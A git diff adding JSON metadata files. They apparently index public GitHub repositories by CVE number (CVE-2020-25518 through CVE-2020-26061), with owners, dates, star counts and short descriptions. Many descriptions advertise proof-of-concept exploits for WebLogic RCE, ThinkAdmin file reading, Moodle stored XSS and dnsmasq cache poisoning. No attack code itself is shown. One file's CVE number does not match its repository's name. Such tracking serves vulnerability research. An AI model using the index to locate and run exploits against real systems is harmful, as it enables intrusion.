"g-rubert\/wordpress_DoS", + "owner": { + "login": "g-rubert", + "id": 40837605, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40837605?v=4", + "html_url": "https:\/\/github.com\/g-rubert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/g-rubert\/wordpress_DoS", + "description": "CVE-2020-25518, CVE-2020-25519", + "fork": false, + "created_at": "2020-09-11T14:14:36Z", + "updated_at": "2022-07-21T02:50:56Z", + "pushed_at": "2020-09-15T04:07:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25540.json b/2020/CVE-2020-25540.json new file mode 100644 index 0000000000..87b2379839 --- /dev/null +++ b/2020/CVE-2020-25540.json @@ -0,0 +1,126 @@ +[ + { + "id": 305338473, + "name": "CVE-2020-25540", + "full_name": "Schira4396\/CVE-2020-25540", + "owner": { + "login": "Schira4396", + "id": 57404930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57404930?v=4", + "html_url": "https:\/\/github.com\/Schira4396", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Schira4396\/CVE-2020-25540", + "description": "ThinkAdmin CVE-2020-25540 poc", + "fork": false, + "created_at": "2020-10-19T09:56:20Z", + "updated_at": "2022-12-19T08:28:56Z", + "pushed_at": "2022-10-20T01:50:15Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467931258, + "name": "ThinkAdmin-CVE-2020-25540", + "full_name": "RajChowdhury240\/ThinkAdmin-CVE-2020-25540", + "owner": { + "login": "RajChowdhury240", + "id": 30806882, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30806882?v=4", + "html_url": "https:\/\/github.com\/RajChowdhury240", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RajChowdhury240\/ThinkAdmin-CVE-2020-25540", + "description": "ThinkAdmin CVE-2020-25540 POC", + "fork": false, + "created_at": "2022-03-09T13:08:31Z", + "updated_at": "2022-07-21T22:35:55Z", + "pushed_at": "2022-03-09T13:10:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 490515662, + "name": "cve-2020-25540", + "full_name": "lowkey0808\/cve-2020-25540", + "owner": { + "login": "lowkey0808", + "id": 49674960, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49674960?v=4", + "html_url": "https:\/\/github.com\/lowkey0808", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lowkey0808\/cve-2020-25540", + "description": null, + "fork": false, + "created_at": "2022-05-10T02:33:46Z", + "updated_at": "2022-05-10T02:47:32Z", + "pushed_at": "2022-05-10T02:51:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 827211960, + "name": "CVE-2020-25540", + "full_name": "simonlee-hello\/CVE-2020-25540", + "owner": { + "login": "simonlee-hello", + "id": 56343277, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56343277?v=4", + "html_url": "https:\/\/github.com\/simonlee-hello", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/simonlee-hello\/CVE-2020-25540", + "description": "ThinkAdmin v5 v6 任意文件读取漏洞利用,可自定义字典爆破", + "fork": false, + "created_at": "2024-07-11T07:59:52Z", + "updated_at": "2024-11-14T01:25:05Z", + "pushed_at": "2024-07-11T08:06:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-2555.json b/2020/CVE-2020-2555.json new file mode 100644 index 0000000000..366c588f20 --- /dev/null +++ b/2020/CVE-2020-2555.json @@ -0,0 +1,188 @@ +[ + { + "id": 245452290, + "name": "CVE-2020-2555", + "full_name": "Hu3sky\/CVE-2020-2555", + "owner": { + "login": "Hu3sky", + "id": 37403964, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37403964?v=4", + "html_url": "https:\/\/github.com\/Hu3sky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hu3sky\/CVE-2020-2555", + "description": null, + "fork": false, + "created_at": "2020-03-06T15:20:17Z", + "updated_at": "2024-08-12T19:58:26Z", + "pushed_at": "2020-03-06T15:29:00Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 245462192, + "name": "CVE-2020-2555", + "full_name": "wsfengfan\/CVE-2020-2555", + "owner": { + "login": "wsfengfan", + "id": 33821840, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33821840?v=4", + "html_url": "https:\/\/github.com\/wsfengfan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wsfengfan\/CVE-2020-2555", + "description": "CVE-2020-2555 Python POC", + "fork": false, + "created_at": "2020-03-06T16:02:59Z", + "updated_at": "2024-11-01T02:37:52Z", + "pushed_at": "2020-04-16T12:04:18Z", + "stargazers_count": 46, + "watchers_count": 46, + "has_discussions": false, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 26, + "watchers": 46, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 245688520, + "name": "CVE-2020-2555", + "full_name": "Y4er\/CVE-2020-2555", + "owner": { + "login": "Y4er", + "id": 40487319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40487319?v=4", + "html_url": "https:\/\/github.com\/Y4er", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Y4er\/CVE-2020-2555", + "description": "Weblogic com.tangosol.util.extractor.ReflectionExtractor RCE", + "fork": false, + "created_at": "2020-03-07T18:58:09Z", + "updated_at": "2024-11-01T02:37:52Z", + "pushed_at": "2022-12-15T00:36:55Z", + "stargazers_count": 176, + "watchers_count": 176, + "has_discussions": false, + "forks_count": 56, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 56, + "watchers": 176, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 246241949, + "name": "cve-2020-2555", + "full_name": "Maskhe\/cve-2020-2555", + "owner": { + "login": "Maskhe", + "id": 30264078, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30264078?v=4", + "html_url": "https:\/\/github.com\/Maskhe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Maskhe\/cve-2020-2555", + "description": "CVE-2020-2555", + "fork": false, + "created_at": "2020-03-10T08:06:08Z", + "updated_at": "2023-09-28T11:12:15Z", + "pushed_at": "2020-03-10T08:15:45Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 296616953, + "name": "CVE-2020-2555", + "full_name": "Uvemode\/CVE-2020-2555", + "owner": { + "login": "Uvemode", + "id": 18345040, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18345040?v=4", + "html_url": "https:\/\/github.com\/Uvemode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Uvemode\/CVE-2020-2555", + "description": null, + "fork": false, + "created_at": "2020-09-18T12:37:20Z", + "updated_at": "2020-09-18T13:51:11Z", + "pushed_at": "2020-10-12T16:54:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 428192560, + "name": "POC_CVE-2020-2555", + "full_name": "Qynklee\/POC_CVE-2020-2555", + "owner": { + "login": "Qynklee", + "id": 23394219, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23394219?v=4", + "html_url": "https:\/\/github.com\/Qynklee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Qynklee\/POC_CVE-2020-2555", + "description": "poc for CVE-2020-2555", + "fork": false, + "created_at": "2021-11-15T09:06:42Z", + "updated_at": "2023-12-13T14:06:34Z", + "pushed_at": "2021-11-15T09:16:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25578.json b/2020/CVE-2020-25578.json new file mode 100644 index 0000000000..9d9e493b66 --- /dev/null +++ b/2020/CVE-2020-25578.json @@ -0,0 +1,33 @@ +[ + { + "id": 318702729, + "name": "freebsd-dirent-info-leak-bugs", + "full_name": "farazsth98\/freebsd-dirent-info-leak-bugs", + "owner": { + "login": "farazsth98", + "id": 25904081, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25904081?v=4", + "html_url": "https:\/\/github.com\/farazsth98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/farazsth98\/freebsd-dirent-info-leak-bugs", + "description": "CVE-2020-25578 and CVE-2020-25579: Some FreeBSD info leak bugs I found in 2020.", + "fork": false, + "created_at": "2020-12-05T04:39:04Z", + "updated_at": "2024-06-29T00:11:56Z", + "pushed_at": "2020-12-05T05:37:44Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25613.json b/2020/CVE-2020-25613.json new file mode 100644 index 0000000000..552056c2d1 --- /dev/null +++ b/2020/CVE-2020-25613.json @@ -0,0 +1,33 @@ +[ + { + "id": 475668293, + "name": "CVE-2020-25613", + "full_name": "metapox\/CVE-2020-25613", + "owner": { + "login": "metapox", + "id": 84276752, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84276752?v=4", + "html_url": "https:\/\/github.com\/metapox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/metapox\/CVE-2020-25613", + "description": null, + "fork": false, + "created_at": "2022-03-30T00:51:08Z", + "updated_at": "2022-03-30T00:51:53Z", + "pushed_at": "2022-03-30T00:51:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25627.json b/2020/CVE-2020-25627.json new file mode 100644 index 0000000000..1dcf20c69d --- /dev/null +++ b/2020/CVE-2020-25627.json @@ -0,0 +1,33 @@ +[ + { + "id": 378117229, + "name": "CVE-2020-25627", + "full_name": "HoangKien1020\/CVE-2020-25627", + "owner": { + "login": "HoangKien1020", + "id": 24661746, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24661746?v=4", + "html_url": "https:\/\/github.com\/HoangKien1020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HoangKien1020\/CVE-2020-25627", + "description": "Stored XSS via moodlenetprofile parameter in user profile", + "fork": false, + "created_at": "2021-06-18T10:37:23Z", + "updated_at": "2023-08-20T10:15:52Z", + "pushed_at": "2021-06-18T10:48:17Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25632.json b/2020/CVE-2020-25632.json new file mode 100644 index 0000000000..0f5f2c99a2 --- /dev/null +++ b/2020/CVE-2020-25632.json @@ -0,0 +1,33 @@ +[ + { + "id": 515707434, + "name": "BootHoleFix", + "full_name": "pauljrowland\/BootHoleFix", + "owner": { + "login": "pauljrowland", + "id": 17676570, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17676570?v=4", + "html_url": "https:\/\/github.com\/pauljrowland", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pauljrowland\/BootHoleFix", + "description": "This script will remediate the BootHole bug identified in CVE-2020-25632 and\/or CVE-2021-20233.", + "fork": false, + "created_at": "2022-07-19T18:56:51Z", + "updated_at": "2022-07-19T19:04:26Z", + "pushed_at": "2022-07-19T19:08:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25637.json b/2020/CVE-2020-25637.json new file mode 100644 index 0000000000..c2edbd93af --- /dev/null +++ b/2020/CVE-2020-25637.json @@ -0,0 +1,33 @@ +[ + { + "id": 318489452, + "name": "CVE-2020-25637-libvirt-double-free", + "full_name": "brahmiboudjema\/CVE-2020-25637-libvirt-double-free", + "owner": { + "login": "brahmiboudjema", + "id": 47785164, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47785164?v=4", + "html_url": "https:\/\/github.com\/brahmiboudjema", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brahmiboudjema\/CVE-2020-25637-libvirt-double-free", + "description": "Double Free", + "fork": false, + "created_at": "2020-12-04T11:01:29Z", + "updated_at": "2020-12-11T17:27:10Z", + "pushed_at": "2020-12-11T17:27:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-256480.json b/2020/CVE-2020-256480.json new file mode 100644 index 0000000000..21bd20b94c --- /dev/null +++ b/2020/CVE-2020-256480.json @@ -0,0 +1,33 @@ +[ + { + "id": 470630889, + "name": "cve-2022-25640-exploit", + "full_name": "dim0x69\/cve-2022-25640-exploit", + "owner": { + "login": "dim0x69", + "id": 1571696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1571696?v=4", + "html_url": "https:\/\/github.com\/dim0x69", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dim0x69\/cve-2022-25640-exploit", + "description": "Exploitation of CVE-2020-256480 using scapy", + "fork": false, + "created_at": "2022-03-16T14:59:08Z", + "updated_at": "2022-03-29T00:14:52Z", + "pushed_at": "2022-03-16T15:05:01Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25668.json b/2020/CVE-2020-25668.json new file mode 100644 index 0000000000..2452cb9618 --- /dev/null +++ b/2020/CVE-2020-25668.json @@ -0,0 +1,33 @@ +[ + { + "id": 731058891, + "name": "Kernel_4.1.15_CVE-2020-25668", + "full_name": "hshivhare67\/Kernel_4.1.15_CVE-2020-25668", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/Kernel_4.1.15_CVE-2020-25668", + "description": null, + "fork": false, + "created_at": "2023-12-13T09:14:29Z", + "updated_at": "2023-12-13T09:19:39Z", + "pushed_at": "2023-12-13T09:18:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25686.json b/2020/CVE-2020-25686.json new file mode 100644 index 0000000000..17f1d32725 --- /dev/null +++ b/2020/CVE-2020-25686.json @@ -0,0 +1,33 @@ +[ + { + "id": 332287630, + "name": "dnspooq", + "full_name": "knqyf263\/dnspooq", + "owner": { + "login": "knqyf263", + "id": 2253692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2253692?v=4", + "html_url": "https:\/\/github.com\/knqyf263", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/knqyf263\/dnspooq", + "description": "DNSpooq - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685)", + "fork": false, + "created_at": "2021-01-23T19:07:18Z", + "updated_at": "2024-11-13T08:24:59Z", + "pushed_at": "2021-01-24T09:05:40Z", + "stargazers_count": 98, + "watchers_count": 98, + "has_discussions": false, + "forks_count": 41, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 41, + "watchers": 98, + "score": 0, + "subscribers_count": 7 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25705.json b/2020/CVE-2020-25705.json new file mode 100644 index 0000000000..8ebaa14b66 --- /dev/null +++ b/2020/CVE-2020-25705.json @@ -0,0 +1,64 @@ +[ + { + "id": 312779884, + "name": "CVE-2020-25705", + "full_name": "tdwyer\/CVE-2020-25705", + "owner": { + "login": "tdwyer", + "id": 3000070, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3000070?v=4", + "html_url": "https:\/\/github.com\/tdwyer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tdwyer\/CVE-2020-25705", + "description": "PoC for CVE-2020-25705 POC-2020-25705", + "fork": false, + "created_at": "2020-11-14T08:53:13Z", + "updated_at": "2023-07-25T14:43:18Z", + "pushed_at": "2020-11-14T08:55:26Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 4, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 475802420, + "name": "linux-4.19.72_CVE-2020-25705", + "full_name": "nanopathi\/linux-4.19.72_CVE-2020-25705", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/linux-4.19.72_CVE-2020-25705", + "description": null, + "fork": false, + "created_at": "2022-03-30T09:10:22Z", + "updated_at": "2022-03-30T09:40:51Z", + "pushed_at": "2022-12-09T11:11:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25747.json b/2020/CVE-2020-25747.json new file mode 100644 index 0000000000..0d6ef21bb1 --- /dev/null +++ b/2020/CVE-2020-25747.json @@ -0,0 +1,33 @@ +[ + { + "id": 296643114, + "name": "CVE-2020-25747", + "full_name": "jet-pentest\/CVE-2020-25747", + "owner": { + "login": "jet-pentest", + "id": 71512502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4", + "html_url": "https:\/\/github.com\/jet-pentest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2020-25747", + "description": "CVE-2020-25747", + "fork": false, + "created_at": "2020-09-18T14:23:35Z", + "updated_at": "2021-02-14T09:24:26Z", + "pushed_at": "2020-09-18T15:02:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25748.json b/2020/CVE-2020-25748.json new file mode 100644 index 0000000000..a0c648295a --- /dev/null +++ b/2020/CVE-2020-25748.json @@ -0,0 +1,33 @@ +[ + { + "id": 296653811, + "name": "CVE-2020-25748", + "full_name": "jet-pentest\/CVE-2020-25748", + "owner": { + "login": "jet-pentest", + "id": 71512502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4", + "html_url": "https:\/\/github.com\/jet-pentest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2020-25748", + "description": "CVE-2020-25748", + "fork": false, + "created_at": "2020-09-18T15:03:38Z", + "updated_at": "2021-02-14T09:24:25Z", + "pushed_at": "2020-09-18T15:04:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25749.json b/2020/CVE-2020-25749.json new file mode 100644 index 0000000000..e05631de8b --- /dev/null +++ b/2020/CVE-2020-25749.json @@ -0,0 +1,33 @@ +[ + { + "id": 296654263, + "name": "CVE-2020-25749", + "full_name": "jet-pentest\/CVE-2020-25749", + "owner": { + "login": "jet-pentest", + "id": 71512502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4", + "html_url": "https:\/\/github.com\/jet-pentest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2020-25749", + "description": "CVE-2020-25749", + "fork": false, + "created_at": "2020-09-18T15:05:16Z", + "updated_at": "2021-02-14T09:24:24Z", + "pushed_at": "2020-09-18T15:06:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25769.json b/2020/CVE-2020-25769.json new file mode 100644 index 0000000000..17005d1e69 --- /dev/null +++ b/2020/CVE-2020-25769.json @@ -0,0 +1,33 @@ +[ + { + "id": 312644639, + "name": "CVE-2020-25769", + "full_name": "defrancescojp\/CVE-2020-25769", + "owner": { + "login": "defrancescojp", + "id": 59481050, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59481050?v=4", + "html_url": "https:\/\/github.com\/defrancescojp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/defrancescojp\/CVE-2020-25769", + "description": "GOG Galaxy Local Privilege Escalation", + "fork": false, + "created_at": "2020-11-13T17:42:40Z", + "updated_at": "2020-11-13T18:51:41Z", + "pushed_at": "2020-11-13T18:51:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25782.json b/2020/CVE-2020-25782.json new file mode 100644 index 0000000000..4a1eb9c873 --- /dev/null +++ b/2020/CVE-2020-25782.json @@ -0,0 +1,33 @@ +[ + { + "id": 333133885, + "name": "accfly", + "full_name": "tezeb\/accfly", + "owner": { + "login": "tezeb", + "id": 10117277, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10117277?v=4", + "html_url": "https:\/\/github.com\/tezeb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tezeb\/accfly", + "description": "Disclosure of Accfly camera vulnerabilities: CVE-2020-25782, CVE-2020-25783, CVE-2020-25784, CVE-2020-25785.", + "fork": false, + "created_at": "2021-01-26T15:48:27Z", + "updated_at": "2021-11-29T06:21:50Z", + "pushed_at": "2021-01-26T17:03:01Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25790.json b/2020/CVE-2020-25790.json new file mode 100644 index 0000000000..cdc0ce0002 --- /dev/null +++ b/2020/CVE-2020-25790.json @@ -0,0 +1,33 @@ +[ + { + "id": 302557281, + "name": "CVE-2020-25790", + "full_name": "7Mitu\/CVE-2020-25790", + "owner": { + "login": "7Mitu", + "id": 30004765, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30004765?v=4", + "html_url": "https:\/\/github.com\/7Mitu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/7Mitu\/CVE-2020-25790", + "description": "Typesetter CMS文件上传漏洞环境", + "fork": false, + "created_at": "2020-10-09T06:50:02Z", + "updated_at": "2024-02-05T16:11:26Z", + "pushed_at": "2022-12-08T06:04:10Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25860.json b/2020/CVE-2020-25860.json new file mode 100644 index 0000000000..94269d2282 --- /dev/null +++ b/2020/CVE-2020-25860.json @@ -0,0 +1,33 @@ +[ + { + "id": 317284918, + "name": "rauc-1.5-integration", + "full_name": "rauc\/rauc-1.5-integration", + "owner": { + "login": "rauc", + "id": 23232203, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23232203?v=4", + "html_url": "https:\/\/github.com\/rauc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rauc\/rauc-1.5-integration", + "description": "integration examples for the CVE-2020-25860 fix", + "fork": false, + "created_at": "2020-11-30T16:39:51Z", + "updated_at": "2023-01-27T20:41:31Z", + "pushed_at": "2021-01-04T10:16:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 12 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25867.json b/2020/CVE-2020-25867.json new file mode 100644 index 0000000000..9b5c3aad96 --- /dev/null +++ b/2020/CVE-2020-25867.json @@ -0,0 +1,33 @@ +[ + { + "id": 297988909, + "name": "CVE-2020-25867", + "full_name": "thomasfady\/CVE-2020-25867", + "owner": { + "login": "thomasfady", + "id": 35258605, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35258605?v=4", + "html_url": "https:\/\/github.com\/thomasfady", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thomasfady\/CVE-2020-25867", + "description": null, + "fork": false, + "created_at": "2020-09-23T14:02:40Z", + "updated_at": "2020-09-24T12:28:50Z", + "pushed_at": "2022-01-23T11:51:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-26061.json b/2020/CVE-2020-26061.json new file mode 100644 index 0000000000..fb3cb01021 --- /dev/null +++ b/2020/CVE-2020-26061.json @@ -0,0 +1,33 @@ +[ + { + "id": 301444083, + "name": "CVE-2020-26061", + "full_name": "missing0x00\/CVE-2020-26061", + "owner": { + "login": "missing0x00", + "id": 29318503, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29318503?v=4", + "html_url": "https:\/\/github.com\/missing0x00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/missing0x00\/CVE-2020-26061", + "description": "CVE-2020-26061 - ClickStudios Passwordstate Password Reset Portal", + "fork": false, + "created_at": "2020-10-05T14:52:34Z", + "updated_at": "2020-10-05T15:23:40Z", + "pushed_at": "2020-10-05T15:22:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } 